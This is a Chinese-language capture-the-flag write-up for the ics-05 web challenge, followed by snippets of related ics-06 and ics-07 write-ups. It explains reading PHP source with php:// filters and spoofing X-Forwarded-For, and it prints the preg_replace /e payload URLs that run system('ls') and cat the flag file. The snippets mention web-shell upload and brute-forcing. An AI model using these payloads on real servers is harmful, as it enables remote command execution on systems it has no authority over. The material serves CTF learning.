cyberearth-2017 : ics-05檔案包含讀原始碼、x-forwarded-for
preg_replace 函式執行乙個正規表示式的搜尋和替換,preg_replce正規表示式部分包含e引數的時候,進行替換的部分會被執行。
掌握正規表示式、偽協議讀取原始碼
windows
firefox、burp
1.進入雲平台裝置維護中心頁面,利用php偽協議讀取原始碼。
2.將得到的原始碼進行base64解密處理,獲取到index.php的原始碼,在121行可以發現後門,如圖所示。
3.對此段**進行審計,可以發現需要將x_forwarded_for設定為127.0.0.1,並且用get方式傳遞三個引數傳遞給preg_replace函式。
4.使用burp修改http請求頭引數,新增x_forwarded_for,將url設定為
/index.php?pat=/(.*)/e&rep=system('ls')&sub=aa可以檢視檔案列表,如圖所示。
5.將url設定為/index.php?pat=/(.*)/e&rep=system('ls+s3chahahadir')&sub=aa檢視s3chahahadir資料夾,發現flag資料夾。
6.將url設定為/index.php?pat=/(.*)/e&rep=system('ls+s3chahahadir/flag')&sub=aa檢視flag資料夾,發現flag.php檔案。
7.將url設定為/index.php?pat=/(.*)/e&rep=system('cat+s3chahahadir/flag/flag.php')&sub=aa檢視flag,如圖所示。
攻防世界web之ics 05
全部點選一遍,只有這個可以有其他介面 題目描述是 其他破壞者會利用工控雲管理系統裝置維護中心的後門入侵系統 在後面新增login.php 無果,御劍掃瞄也無結果,原始碼也找不到其他東西 再次點選上面的 雲平台裝置維護中心 url欄有引數?page index 存在get傳值 page的引數聯想到可能...
攻防世界ics 07 wp
以上是source裡面的三段php 先看第一段 如果page存在,且不為index.php,就檔案包含flag.php 第二段 如果 session admin 存在,就能post傳con和file 可以上傳一句話了。第三段 繞過if裡的語句,就可以使 session admin 為true 大概思...
攻防世界web高手高階區 ics 06
今天藉著這道web題順便學會了利用burpsuite進行爆破 先擺題目 開啟題目環境,發現是乙個工程管理系統,根據題目找到報表中心,點進去 好像沒什麼收穫,f12看一下,發現id 1,試了一下id 2,3,4 都沒用,好尷尬。既然人工不行,那就只能用工具爆破了。想爆破,得有字典,我用的0 5000,...